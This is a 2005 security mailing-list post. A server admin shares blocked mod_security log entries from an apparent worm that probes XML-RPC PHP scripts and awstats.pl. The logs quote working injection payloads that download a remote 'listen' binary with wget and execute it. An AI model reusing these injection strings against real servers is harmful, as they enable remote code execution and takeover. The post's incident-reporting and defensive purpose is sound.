[Dshield] Linux Exploit Search

MaXX bs139412 at skynet.be
Thu Nov 10 01:45:04 GMT 2005


On Wednesday 09 November 2005 13:09, craig at xeriom.net wrote:
> On Tue, 8 Nov 2005 23:59:11 -0500, Ian Scott <ian at pairowoodies.com> wrote:
> > On November 8, 2005 09:11 pm, David Cary Hart wrote:
> >> What's particularly troubling here is that there are three different
> >> clients following the exact same pattern.
> > <snip>
> > Looks like an automated scan looking for vulnerable applications.
> > Possibly someone using Nexus?
> It could be the an XML-RPC worm like the one reported yesterday at
> http://isc.sans.org/diary.php?storyid=829
It seems... 

This worm seem to spread quickly, I already have 10 sources of those things in 
my mod_security logs, and only the "listen" variant as far as can see, but I 
haven't looked closely.
Some of requested urls are different from David Cary Hart logs.

For those who are interested the converted Snort rules for mod_security can 
catch and block it (I hope). Patch your intall and don't apply those rules 
blindly and double check if they don't break you site...

--
MaXX

----More details below for who want-----
Here is a "pattern" this one repeats for 5 different xmlrpc.php script:        
(sorry for the awfull linewraps if any)
/xmlrpc.php
/blog/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/drupal/xmlrpc.php

Request: 12.214.68.78 - - [10/Nov/2005:01:01:28 +0100] 
"POST /drupal/xmlrpc.php HTTP/1.1" 406 164
Handler: (null)
----------------------------------------
POST /drupal/xmlrpc.php HTTP/1.1
Content-Length: 269
Content-Type: text/xml
Host: 81.244.58.XX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
mod_security-message: Access denied with code 406. Pattern match "wget\x20" at 
POST_PAYLOAD.
mod_security-action: 406

259
<?xml 
version="1.0"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo 
'_begin_';echo `cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./listen         
`;echo '_end_';exit;/*</name></value></param></params></methodCall>

HTTP/1.1 406 Not Acceptable
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

Another attempt is an awstat.pl exploit (repeats for 3 different url):
/awstats/awstats.pl
/cgi-bin/awstats.pl
/cgi-bin/awstats/awstats.pl

Request: 12.214.68.78 - - [10/Nov/2005:01:01:13 +0100] 
"GET /cgi-bin/awstats.pl?configdir=|
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  
HTTP/1.1" 406 164
Handler: perl-script
----------------------------------------
GET /cgi-bin/awstats.pl?configdir=|
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  
HTTP/1.1
Host: 81.244.58.XX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
mod_security-message: Access denied with code 406. Pattern match "wget\x20" at 
THE_REQUEST.
mod_security-action: 406

HTTP/1.1 406 Not Acceptable
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1


More information about the list mailing list